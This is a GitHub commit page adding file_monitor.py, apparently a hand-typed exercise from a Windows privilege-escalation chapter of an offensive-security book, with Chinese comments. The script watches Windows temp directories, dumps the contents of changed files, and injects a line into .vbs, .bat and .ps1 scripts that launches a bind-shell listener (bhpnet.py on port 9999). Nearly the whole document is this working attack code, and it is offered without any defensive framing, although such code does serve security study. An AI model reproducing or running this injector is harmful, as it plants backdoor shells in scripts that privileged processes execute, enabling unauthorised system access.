Skip to content

Commit 5dfedc5

Browse files
giantbranchgiantbranch
committed
push chapter10 file_monitor.py
1 parent 9e09ff8 commit 5dfedc5

File tree

1 file changed

+130
-0
lines changed

1 file changed

+130
-0
lines changed

我手敲的代码(中文注释)/chapter10/file_monitor.py

Lines changed: 130 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,130 @@
1+
#-*- coding:utf8 -*-
2+
3+
"""
4+
@version:
5+
@author: giantbranch
6+
@file: file_monitor.py
7+
@time: 2016/3/14 23:36
8+
"""
9+
10+
import tempfile
11+
import threading
12+
import win32file
13+
import win32con
14+
import os
15+
16+
# 这些是典型的临时文件所在路径,就是我们监控的目录
17+
dirs_to_monitor = ["C:\\WINDOWS\\Temp",tempfile.gettempdir()]
18+
19+
# 文件修改行为对应常量
20+
FILE_CREATE = 1
21+
FILE_DELETE = 2
22+
FILE_MODIFIED = 3
23+
FILE_RENAMED_FROM = 4
24+
FILE_RENAMED_TO = 5
25+
26+
# 定义匹配特定文件扩展名的字典
27+
file_types = {}
28+
29+
command = "python C:\\WINDOWS\\TEMP\\bhpnet.py –l –p 9999 –c"
30+
# 每段扩展名对应一个特定的标签及我们想要插入的一段脚本
31+
file_types['.vbs'] = ["\r\n'bhpmarker\r\n","\r\nCreateObject(\"Wscript.Shell\").Run(\"%s\")\r\n" % command]
32+
file_types['.bat'] = ["\r\nREM bhpmarker\r\n","\r\n%s\r\n" % command]
33+
file_types['.ps1'] = ["\r\n#bhpmarker","Start-Process \"%s\"" % command]
34+
35+
# 用于执行代码插入的函数
36+
def inject_code(full_filename, extension, contents):
37+
# 判断文件是否存在标记
38+
if file_types[extension][0] in contents:
39+
return
40+
41+
# 如果没有标记的话,那么插入代码并标记
42+
full_contents = file_types[extension][0]
43+
full_contents += file_types[extension][1]
44+
full_contents += contents
45+
46+
fd = open(full_filename, "wb")
47+
fd.write(full_contents)
48+
fd.close()
49+
50+
print "[\o/] Injected code"
51+
52+
return
53+
54+
# 为每个监控器起一个线程
55+
def start_monitor(path_to_watch):
56+
57+
# 访问模式
58+
FILE_LIST_DIRECTORY = 0x0001
59+
60+
# 获取文件目录句柄
61+
h_directory = win32file.CreateFile(
62+
path_to_watch,
63+
FILE_LIST_DIRECTORY,
64+
win32con.FILE_SHARE_READ |win32con.FILE_SHARE_WRITE | win32con.FILE_SHARE_DELETE,
65+
None,
66+
win32con.OPEN_EXISTING,
67+
win32con.FILE_FLAG_BACKUP_SEMANTICS,
68+
None
69+
)
70+
71+
while 1:
72+
try:
73+
# 这函数会在目录结构改变时通知我们
74+
results = win32file.ReadDirectoryChangesW(
75+
h_directory,
76+
1024,
77+
True,
78+
win32con.FILE_NOTIFY_CHANGE_FILE_NAME |
79+
win32con.FILE_NOTIFY_CHANGE_DIR_NAME |
80+
win32con.FILE_NOTIFY_CHANGE_ATTRIBUTES |
81+
win32con.FILE_NOTIFY_CHANGE_SIZE |
82+
win32con.FILE_NOTIFY_CHANGE_LAST_WRITE |
83+
win32con.FILE_NOTIFY_CHANGE_SECURITY,
84+
None,
85+
None
86+
)
87+
88+
# 我们可以获得发送了何种改变,以及目标文件的名称
89+
for action,file_name in results:
90+
full_filename = os.path.join(path_to_watch, file_name)
91+
92+
if action == FILE_CREATE:
93+
print "[ + ] Created %s" % full_filename
94+
elif action == FILE_DELETE:
95+
print "[ - ] Deleted %s" % full_filename
96+
elif action == FILE_MODIFIED:
97+
print "[ * ] Modified %s" % full_filename
98+
# 输出文件内容
99+
print "[vvv] Dumping contents..."
100+
try:
101+
# 打开文件读数据
102+
fd = open(full_filename, "rb")
103+
contents = fd.read()
104+
fd.close()
105+
print contents
106+
print "[^^^] Dump complete."
107+
except:
108+
print "[!!!] Failed."
109+
110+
# 文件和文件扩展名分离
111+
filename, extension = os.path.splitext(full_filename)
112+
if extension in file_types:
113+
inject_code(full_filename, extension, contents)
114+
115+
# 重命名哪个文件
116+
elif action == FILE_RENAMED_FROM:
117+
print "[ > ] Renamed from: %s" % full_filename
118+
# 重命名后的文件名是?
119+
elif action == FILE_RENAMED_TO:
120+
print "[ < ] Renamed to: %s" % full_filename
121+
else:
122+
print "[???] Unknown: %s" % full_filename
123+
except:
124+
pass
125+
126+
127+
for path in dirs_to_monitor:
128+
monitor_thread = threading.Thread(target=start_monitor,args=(path,))
129+
print "Spawning monitoring thread for path: %s" % path
130+
monitor_thread.start()

0 commit comments

Comments
 (0)